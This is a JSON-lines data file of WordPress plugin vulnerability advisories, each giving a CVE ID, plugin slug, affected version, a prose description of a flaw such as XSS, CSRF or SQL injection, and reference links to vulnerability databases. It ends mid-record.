{"CVE_ID":"CVE-2024-12158","slug":"ultimate-popup-creator","versionImpact":"3.2.6","description":"The Popup \u2013 MailChimp, GetResponse and ActiveCampaign Intergrations plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'upc_delete_db_data' AJAX action in all versions up to, and including, 3.2.6. This makes it possible for unauthenticated attackers to delete the DB data for the plugin.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-popup-creator\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-popup-creator\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93a698df-fd68-4fbc-946e-a9b5a7f93b71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93a698df-fd68-4fbc-946e-a9b5a7f93b71?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12203","slug":"rss-icon-widget","versionImpact":"5.2","description":"The RSS Icon Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018link_color\u2019 parameter in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rss-icon-widget\\\/trunk\\\/rss-icon-widget.php#L195\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rss-icon-widget\\\/trunk\\\/rss-icon-widget.php#L195\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rss-icon-widget\\\/trunk\\\/rss-icon-widget.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rss-icon-widget\\\/trunk\\\/rss-icon-widget.php#L83\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbd8fec7-c95a-4c03-ac0d-894a54906863?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbd8fec7-c95a-4c03-ac0d-894a54906863?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11886","slug":"lead-capturing-call-to-actions-by-vcita","versionImpact":"2.7.1","description":"The Contact Form and Calls To Action by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vCitaMeetingScheduler ' shortcode in all versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/lead-capturing-call-to-actions.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/lead-capturing-call-to-actions.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-widgets-functions.php#L104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-widgets-functions.php#L104\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-widgets-functions.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-capturing-call-to-actions-by-vcita\\\/trunk\\\/vcita-widgets-functions.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a9021b4-54f8-4ba3-bc81-49271dde1b44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a9021b4-54f8-4ba3-bc81-49271dde1b44?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13339","slug":"debounce-io-email-validator","versionImpact":"5.6.6","description":"The DeBounce Email Validator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.6.6. This is due to missing or incorrect nonce validation on the 'debounce_email_validator' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/debounce-io-email-validator\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/debounce-io-email-validator\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9121ab04-d16b-468b-880f-8f00bcec6489?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9121ab04-d16b-468b-880f-8f00bcec6489?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8090","slug":"javascript-logic","versionImpact":"0.1","description":"The JavaScript Logic WordPress plugin through 0.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c9dcd450-e8ed-4058-b002-20fb3b879ee0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c9dcd450-e8ed-4058-b002-20fb3b879ee0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6786","slug":"doccheck-login","versionImpact":"1.1.5","description":"The DocCheck Login plugin for WordPress is vulnerable to unauthorized post access in all versions up to, and including, 1.1.5. This is due to plugin redirecting a user to login on a password protected post after the page has loaded. This makes it possible for unauthenticated attackers to read posts they should not have access to.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/doccheck-login\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/doccheck-login\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0739b5ec-b1c4-4451-97c1-f8d5ed26a2d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0739b5ec-b1c4-4451-97c1-f8d5ed26a2d5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4523","slug":"idonate","description":"The IDonate \u2013 Blood Donation, Request And Donor Management System plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the admin_donor_profile_view() function in versions 2.0.0 to 2.1.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to expose an administrator\u2019s username, email address, and all donor fields.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/idonate\\\/tags\\\/2.1.9\\\/src\\\/Admin\\\/Admin.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/idonate\\\/tags\\\/2.1.9\\\/src\\\/Admin\\\/Admin.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/idonate\\\/tags\\\/2.1.9\\\/src\\\/Helpers\\\/IDonateAjaxHandler.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/idonate\\\/tags\\\/2.1.9\\\/src\\\/Helpers\\\/IDonateAjaxHandler.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334424\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334424\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/idonate\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/idonate\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fe7668b-9d70-44b7-a347-3922c0b8684c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fe7668b-9d70-44b7-a347-3922c0b8684c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-26536","slug":"spotify-play-button-for-wordpress","versionImpact":"2.05","description":"Auth. (contributor+) Cross-Site Scripting (XSS) vulnerability in Jonk @ Follow me Darling Sp*tify Play Button for WordPress plugin <= 2.05 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/spotify-play-button-for-wordpress\\\/wordpress-sp-tify-play-button-for-wordpress-plugin-2-05-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/spotify-play-button-for-wordpress\\\/wordpress-sp-tify-play-button-for-wordpress-plugin-2-05-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4140","slug":"wp-ultimate-csv-importer","versionImpact":"7.9.8","description":"The WP Ultimate CSV Importer plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 7.9.8 due to insufficient restriction on the 'get_header_values' function. This makes it possible for authenticated attackers, with minimal permissions such as an author, if the administrator previously grants access in the plugin settings, to modify their user role by supplying the 'wp_capabilities->cus1' parameter.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2944635\\\/wp-ultimate-csv-importer\\\/trunk\\\/wp-ultimate-csv-importer.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fdba41f-daa5-44e8-bc47-aa8b7bd31054?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5fdba41f-daa5-44e8-bc47-aa8b7bd31054?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-csv-importer\\\/tags\\\/7.9.6\\\/importExtensions\\\/ImportHelpers.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-csv-importer\\\/tags\\\/7.9.6\\\/importExtensions\\\/ImportHelpers.php#L205\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6980","slug":"wp-sms","versionImpact":"6.5","description":"The WP SMS \u2013 Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5. This is due to missing or incorrect nonce validation on the 'delete' action of the wp-sms-subscribers page. This makes it possible for unauthenticated attackers to delete subscribers via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94ad6b51-ff8d-48d5-9a70-1781d13990a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94ad6b51-ff8d-48d5-9a70-1781d13990a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-sms\\\/wp-sms\\\/commit\\\/0f36e2f521ade8ddfb3e04786defe074370afb50\",\"name\":\"https:\\\/\\\/github.com\\\/wp-sms\\\/wp-sms\\\/commit\\\/0f36e2f521ade8ddfb3e04786defe074370afb50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3015006%40wp-sms&new=3015006%40wp-sms&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3015006%40wp-sms&new=3015006%40wp-sms&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1043","slug":"accelerated-mobile-pages","versionImpact":"1.0.93.1","description":"The AMP for WP \u2013 Accelerated Mobile Pages plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'amppb_remove_saved_layout_data' function in all versions up to, and including, 1.0.93.1. This makes it possible for authenticated attackers, with contributor access and above, to delete arbitrary posts on the site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffb70e82-355b-48f3-92d0-19659ed2550e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffb70e82-355b-48f3-92d0-19659ed2550e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.93.1\\\/pagebuilder\\\/inc\\\/adminAjaxContents.php#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.93.1\\\/pagebuilder\\\/inc\\\/adminAjaxContents.php#L134\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accelerated-mobile-pages\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/accelerated-mobile-pages\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030425\\\/accelerated-mobile-pages\\\/tags\\\/1.0.93.2\\\/pagebuilder\\\/inc\\\/adminAjaxContents.php?old=3025105&old_path=accelerated-mobile-pages%2Ftags%2F1.0.93.1%2Fpagebuilder%2Finc%2FadminAjaxContents.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3030425\\\/accelerated-mobile-pages\\\/tags\\\/1.0.93.2\\\/pagebuilder\\\/inc\\\/adminAjaxContents.php?old=3025105&old_path=accelerated-mobile-pages%2Ftags%2F1.0.93.1%2Fpagebuilder%2Finc%2FadminAjaxContents.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0951","slug":"advanced-facebook-twitter-widget","versionImpact":"1.7","description":"The Advanced Social Feeds Widget & Shortcode WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88b2e479-eb15-4213-9df8-3d353074974e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88b2e479-eb15-4213-9df8-3d353074974e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2119","slug":"luckywp-table-of-contents","versionImpact":"2.1.4","description":"The LuckyWP Table of Contents plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the attrs parameter in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ceb8f67-0c7a-4028-81b9-f2cdbcba1a80?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ceb8f67-0c7a-4028-81b9-f2cdbcba1a80?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/luckywp-table-of-contents\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/luckywp-table-of-contents\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4756","slug":"wp-backpack","versionImpact":"2.1","description":"The WP Backpack WordPress plugin through 2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce4688b6-6713-43b5-aa63-8a3b036bd332\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce4688b6-6713-43b5-aa63-8a3b036bd332\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9850","slug":"case-study","versionImpact":"1.0","description":"The SVG Case Study plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7fe128e-02b7-4838-8575-db09d33d2340?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7fe128e-02b7-4838-8575-db09d33d2340?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/case-study\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/case-study\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12157","slug":"ultimate-popup-creator","versionImpact":"3.2.6","description":"The Popup \u2013 MailChimp, GetResponse and ActiveCampaign Intergrations plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter of the 'upc_delete_db_record' AJAX action in all versions up to, and including, 3.2.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-popup-creator\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-popup-creator\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e63ce97-40af-493d-9376-231a99d9bd58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e63ce97-40af-493d-9376-231a99d9bd58?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13336","slug":"disable-auto-updates","versionImpact":"1.4","description":"The Disable Auto Updates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the 'disable-auto-updates' page. This makes it possible for unauthenticated attackers to disable all auto updates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/disable-auto-updates\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/disable-auto-updates\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60413b3b-f9b0-40ca-af0a-f7cf87ab793a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60413b3b-f9b0-40ca-af0a-f7cf87ab793a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1383","slug":"podlove-podcasting-plugin-for-wordpress","versionImpact":"4.2.2","description":"The Podlove Podcast Publisher plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.2. This is due to missing or incorrect nonce validation on the ajax_transcript_delete() function. This makes it possible for unauthenticated attackers to delete arbitrary episode transcripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/podlove-podcasting-plugin-for-wordpress\\\/tags\\\/4.2.0\\\/lib\\\/modules\\\/transcripts\\\/transcripts.php#L223\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/podlove-podcasting-plugin-for-wordpress\\\/tags\\\/4.2.0\\\/lib\\\/modules\\\/transcripts\\\/transcripts.php#L223\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246867\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246867\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/podlove-podcasting-plugin-for-wordpress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/podlove-podcasting-plugin-for-wordpress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00a95ae7-3c58-4e5e-aaef-c04d1dacf27f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/00a95ae7-3c58-4e5e-aaef-c04d1dacf27f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13618","slug":"aoa-downloadable","versionImpact":"0.1.0","description":"The aoa-downloadable WordPress plugin through 0.1.0 lacks authorization and authentication for requests to its download.php endpoint, allowing unauthenticated visitors to make requests to arbitrary URLs.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6a78233-3f23-4da4-9bc0-1439cde20a30\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6a78233-3f23-4da4-9bc0-1439cde20a30\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8085","slug":"peoplepond","versionImpact":"1.1.9","description":"The PeoplePond WordPress plugin through 1.1.9 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8b43d3a2-4324-43fd-9c2a-90dbdc1d12a6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8b43d3a2-4324-43fd-9c2a-90dbdc1d12a6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6783","slug":"gozen-forms","versionImpact":"1.1.5","description":"The GoZen Forms plugin for WordPress is vulnerable to SQL Injection via the 'forms-id' parameter of the emdedSc() function in all versions up to, and including, 1.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gozen-forms\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gozen-forms\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/784998a7-550d-4299-9995-af01e5ee1d21?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/784998a7-550d-4299-9995-af01e5ee1d21?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1871","slug":"yourchannel","versionImpact":"1.2.3","description":"The YourChannel plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the deleteLang function. This makes it possible for unauthenticated attackers to reset the plugin's quick language translation settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L505\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yourchannel\\\/trunk\\\/YourChannel.php?rev=2844975#L505\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yourchannel\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7ae863c-4638-49ab-bb1f-52346884c3aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7ae863c-4638-49ab-bb1f-52346884c3aa?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0584","slug":"vk-blocks","versionImpact":"1.57.0.5","description":"The VK Blocks plugin for WordPress is vulnerable to improper authorization via the REST 'update_options' function in versions up to, and including, 1.57.0.5. This allows authenticated attackers, with contributor-level permissions or above, to change the 'vk_font_awesome_version' option to an arbitrary value.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/font-awesome\\\/class-vk-blocks-font-awesome-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/font-awesome\\\/class-vk-blocks-font-awesome-api.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b90b7f6c-df7f-48a5-b283-cf5facbd71e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b90b7f6c-df7f-48a5-b283-cf5facbd71e5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2359","slug":"revslider","versionImpact":"6.6.12","description":"The Slider Revolution WordPress plugin through 6.6.12 does not check for valid image files upon import, leading to an arbitrary file upload which may be escalated to Remote Code Execution in some server configurations.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8350890-e6d4-4b04-a158-2b0ee3748e65\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8350890-e6d4-4b04-a158-2b0ee3748e65\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4139","slug":"wp-ultimate-csv-importer","versionImpact":"7.9.8","description":"The WP Ultimate CSV Importer plugin for WordPress is vulnerable to Sensitive Information Exposure  via Directory Listing due to missing restriction in export folder indexing in versions up to, and including, 7.9.8. This makes it possible for unauthenticated attackers to list and view exported 